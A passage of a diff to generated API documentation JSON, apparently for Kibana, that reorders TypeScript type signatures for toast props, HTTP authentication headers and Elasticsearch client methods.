| \"onAuxClick\" | \"onAuxClickCapture\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\" | \"data-test-subj\"> & { title?: string | ", "MountPoint", " | undefined; text?: string | ", "MountPoint", @@ -10162,7 +10162,7 @@ "signature": [ "Pick<", "Toast", - ", \"children\" | \"color\" | \"className\" | \"lang\" | \"style\" | \"role\" | \"tabIndex\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChange\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onError\" | \"onErrorCapture\" | \"onKeyDown\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClick\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"data-test-subj\" | \"hidden\" | \"security\" | \"defaultValue\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"translate\" | \"radioGroup\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\"> & { title?: string | ", + ", \"children\" | \"onError\" | \"hidden\" | \"color\" | \"className\" | \"onChange\" | \"onKeyDown\" | \"onClick\" | \"security\" | \"defaultValue\" | \"lang\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"style\" | \"tabIndex\" | \"translate\" | \"radioGroup\" | \"role\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onErrorCapture\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\" | \"data-test-subj\"> & { title?: string | ", "MountPoint", " | undefined; text?: string | ", "MountPoint", @@ -14381,7 +14381,7 @@ "Headers used for authentication against Elasticsearch" ], "signature": [ - "{ from?: string | string[] | undefined; origin?: string | string[] | undefined; warning?: string | string[] | undefined; location?: string | string[] | undefined; date?: string | string[] | undefined; expires?: string | string[] | undefined; range?: string | string[] | undefined; allow?: string | string[] | undefined; accept?: string | string[] | undefined; host?: string | string[] | undefined; etag?: string | string[] | undefined; authorization?: string | string[] | undefined; \"accept-language\"?: string | string[] | undefined; \"accept-patch\"?: string | string[] | undefined; \"accept-ranges\"?: string | string[] | undefined; \"access-control-allow-credentials\"?: string | string[] | undefined; \"access-control-allow-headers\"?: string | string[] | undefined; \"access-control-allow-methods\"?: string | string[] | undefined; \"access-control-allow-origin\"?: string | string[] | undefined; \"access-control-expose-headers\"?: string | string[] | undefined; \"access-control-max-age\"?: string | string[] | undefined; \"access-control-request-headers\"?: string | string[] | undefined; \"access-control-request-method\"?: string | string[] | undefined; age?: string | string[] | undefined; \"alt-svc\"?: string | string[] | undefined; \"cache-control\"?: string | string[] | undefined; connection?: string | string[] | undefined; \"content-disposition\"?: string | string[] | undefined; \"content-encoding\"?: string | string[] | undefined; \"content-language\"?: string | string[] | undefined; \"content-length\"?: string | string[] | undefined; \"content-location\"?: string | string[] | undefined; \"content-range\"?: string | string[] | undefined; \"content-type\"?: string | string[] | undefined; cookie?: string | string[] | undefined; expect?: string | string[] | undefined; forwarded?: string | string[] | undefined; \"if-match\"?: string | string[] | undefined; \"if-modified-since\"?: string | string[] | undefined; \"if-none-match\"?: string | string[] | undefined; \"if-unmodified-since\"?: string | string[] | undefined; \"last-modified\"?: string | string[] | undefined; pragma?: string | string[] | undefined; \"proxy-authenticate\"?: string | string[] | undefined; \"proxy-authorization\"?: string | string[] | undefined; \"public-key-pins\"?: string | string[] | undefined; referer?: string | string[] | undefined; \"retry-after\"?: string | string[] | undefined; \"sec-websocket-accept\"?: string | string[] | undefined; \"sec-websocket-extensions\"?: string | string[] | undefined; \"sec-websocket-key\"?: string | string[] | undefined; \"sec-websocket-protocol\"?: string | string[] | undefined; \"sec-websocket-version\"?: string | string[] | undefined; \"set-cookie\"?: string | string[] | undefined; \"strict-transport-security\"?: string | string[] | undefined; tk?: string | string[] | undefined; trailer?: string | string[] | undefined; \"transfer-encoding\"?: string | string[] | undefined; upgrade?: string | string[] | undefined; \"user-agent\"?: string | string[] | undefined; vary?: string | string[] | undefined; via?: string | string[] | undefined; \"www-authenticate\"?: string | string[] | undefined; } & { [header: string]: string | string[] | undefined; }" + "{ accept?: string | string[] | undefined; \"accept-language\"?: string | string[] | undefined; \"accept-patch\"?: string | string[] | undefined; \"accept-ranges\"?: string | string[] | undefined; \"access-control-allow-credentials\"?: string | string[] | undefined; \"access-control-allow-headers\"?: string | string[] | undefined; \"access-control-allow-methods\"?: string | string[] | undefined; \"access-control-allow-origin\"?: string | string[] | undefined; \"access-control-expose-headers\"?: string | string[] | undefined; \"access-control-max-age\"?: string | string[] | undefined; \"access-control-request-headers\"?: string | string[] | undefined; \"access-control-request-method\"?: string | string[] | undefined; age?: string | string[] | undefined; allow?: string | string[] | undefined; \"alt-svc\"?: string | string[] | undefined; authorization?: string | string[] | undefined; \"cache-control\"?: string | string[] | undefined; connection?: string | string[] | undefined; \"content-disposition\"?: string | string[] | undefined; \"content-encoding\"?: string | string[] | undefined; \"content-language\"?: string | string[] | undefined; \"content-length\"?: string | string[] | undefined; \"content-location\"?: string | string[] | undefined; \"content-range\"?: string | string[] | undefined; \"content-type\"?: string | string[] | undefined; cookie?: string | string[] | undefined; date?: string | string[] | undefined; etag?: string | string[] | undefined; expect?: string | string[] | undefined; expires?: string | string[] | undefined; forwarded?: string | string[] | undefined; from?: string | string[] | undefined; host?: string | string[] | undefined; \"if-match\"?: string | string[] | undefined; \"if-modified-since\"?: string | string[] | undefined; \"if-none-match\"?: string | string[] | undefined; \"if-unmodified-since\"?: string | string[] | undefined; \"last-modified\"?: string | string[] | undefined; location?: string | string[] | undefined; origin?: string | string[] | undefined; pragma?: string | string[] | undefined; \"proxy-authenticate\"?: string | string[] | undefined; \"proxy-authorization\"?: string | string[] | undefined; \"public-key-pins\"?: string | string[] | undefined; range?: string | string[] | undefined; referer?: string | string[] | undefined; \"retry-after\"?: string | string[] | undefined; \"sec-websocket-accept\"?: string | string[] | undefined; \"sec-websocket-extensions\"?: string | string[] | undefined; \"sec-websocket-key\"?: string | string[] | undefined; \"sec-websocket-protocol\"?: string | string[] | undefined; \"sec-websocket-version\"?: string | string[] | undefined; \"set-cookie\"?: string | string[] | undefined; \"strict-transport-security\"?: string | string[] | undefined; tk?: string | string[] | undefined; trailer?: string | string[] | undefined; \"transfer-encoding\"?: string | string[] | undefined; upgrade?: string | string[] | undefined; \"user-agent\"?: string | string[] | undefined; vary?: string | string[] | undefined; via?: string | string[] | undefined; warning?: string | string[] | undefined; \"www-authenticate\"?: string | string[] | undefined; } & { [header: string]: string | string[] | undefined; }" ], "path": "node_modules/@types/kbn__core-elasticsearch-server/index.d.ts", "deprecated": false @@ -15746,7 +15746,61 @@ "\nA {@link ElasticsearchClient | client} to be used to query the ES cluster on behalf of the Kibana internal user" ], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -15814,7 +15864,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", @@ -15840,33 +15890,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", @@ -15892,33 +15916,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -16878,6 +16876,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", @@ -20672,7 +20672,61 @@ "\nA {@link ElasticsearchClient | client} to be used to query the elasticsearch cluster\non behalf of the internal Kibana user." ], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -20740,7 +20790,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", @@ -20766,33 +20816,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", @@ -20818,33 +20842,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -21804,6 +21802,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", @@ -21875,7 +21875,61 @@ "\nA {@link ElasticsearchClient | client} to be used to query the elasticsearch cluster\non behalf of the user that initiated the request to the Kibana server." ], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | 